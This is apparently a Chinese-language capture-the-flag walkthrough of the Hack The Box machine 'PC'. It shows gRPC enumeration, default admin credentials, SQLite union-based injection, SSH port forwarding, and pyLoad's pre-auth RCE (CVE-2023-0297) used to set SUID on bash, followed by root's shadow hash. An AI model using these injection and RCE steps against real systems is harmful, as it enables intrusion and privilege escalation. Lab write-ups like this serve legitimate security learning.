基本信息
- https://app.hackthebox.com/machines/PC
- 10.10.11.214
data:image/s3,"s3://crabby-images/9e442/9e442fead63067e84d1076974dfb539d7fd6e150" alt=""
端口扫描
需要全端口,有个50051:
1 | nmap -p- -Pn 10.10.11.214 |
gRPC 50051
搜索可以知道50051是gRPC:
- GRPC Core: gRPC Server Reflection Tutorial
https://grpc.github.io/grpc/core/md_doc_server_reflection_tutorial.html
可以直接使用grpcui图形界面进行交互:
- fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
https://github.com/fullstorydev/grpcui
1 | brew install grpcui |
data:image/s3,"s3://crabby-images/ec9f4/ec9f472e3cafa3db8811f1ece86c75066b41584f" alt=""
SimpleApp
LoginUser
直接使用 admin : admin
登录,得到一个id和token:
1 | { |
(下面的图是一开始自己注册登录得到的结果,懒得改成admin了)
data:image/s3,"s3://crabby-images/8f5e2/8f5e2ee98a0bf9a89eb6000a01ffec0402c64b90" alt=""
getinfo
然后使用得到的id和token调用getinfo:
data:image/s3,"s3://crabby-images/22610/2261024ff8e005f5bad6b3cda32d9abbb06f7833" alt=""
sql注入
简单测试发现id处存在注入:
data:image/s3,"s3://crabby-images/790eb/790ebd888f6c871cde3f08a9c456823f3429c100" alt=""
data:image/s3,"s3://crabby-images/47da9/47da9e4174e100a2d2cfcbf54381ab7941d54614" alt=""
后面就一步步注入获取数据,sqlite数据库:
- PayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md
1 | 678 union select sqlite_version() |
data:image/s3,"s3://crabby-images/bc0c3/bc0c3c1ec0de2b183ffbb60a9a69908cfb28626f" alt=""
user flag
得到的sau用户账号密码,ssh登录:
1 | sau |
data:image/s3,"s3://crabby-images/7d096/7d096843b50d8b80812116fc27c828cc9e7e5e6a" alt=""
提权信息
简单枚举发现本地8000端口:
data:image/s3,"s3://crabby-images/c605d/c605d6cd7256b6df90c67c6ae95fcba588595ce7" alt=""
转发出来查看,发现是pyLoad:
1 | ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000 |
data:image/s3,"s3://crabby-images/a55d0/a55d0244d11d847519ce81ad8404ccd67dcd027b" alt=""
搜索可以发现相关漏洞:
- Pre-auth RCE vulnerability found in pyload
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
提权 & root flag
最简单的,直接给bash加个suid,注意编码:
1 | curl -i -s -k -X $'POST' \ |
data:image/s3,"s3://crabby-images/e0e18/e0e180dd21782020d7519a85daf8e79d557e039f" alt=""
data:image/s3,"s3://crabby-images/01492/014924d590622932732d521931062afbf20e7489" alt=""
shadow
1 | root:$6$DyP1KfBYGKoKi9P1$UiRaoILBpT81btxBn3Hzd5KmsRiijiMcR8J/F7ULWYvIMVzicsE3s/Yfyd20bypQUJ4utbJMRzYip4HT0s9ri.:19368:0:99999:7::: |
参考资料
- GRPC Core: gRPC Server Reflection Tutorial
https://grpc.github.io/grpc/core/md_doc_server_reflection_tutorial.html - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
https://github.com/fullstorydev/grpcui - PayloadsAllTheThings/SQLite Injection.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md - Pre-auth RCE vulnerability found in pyload
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad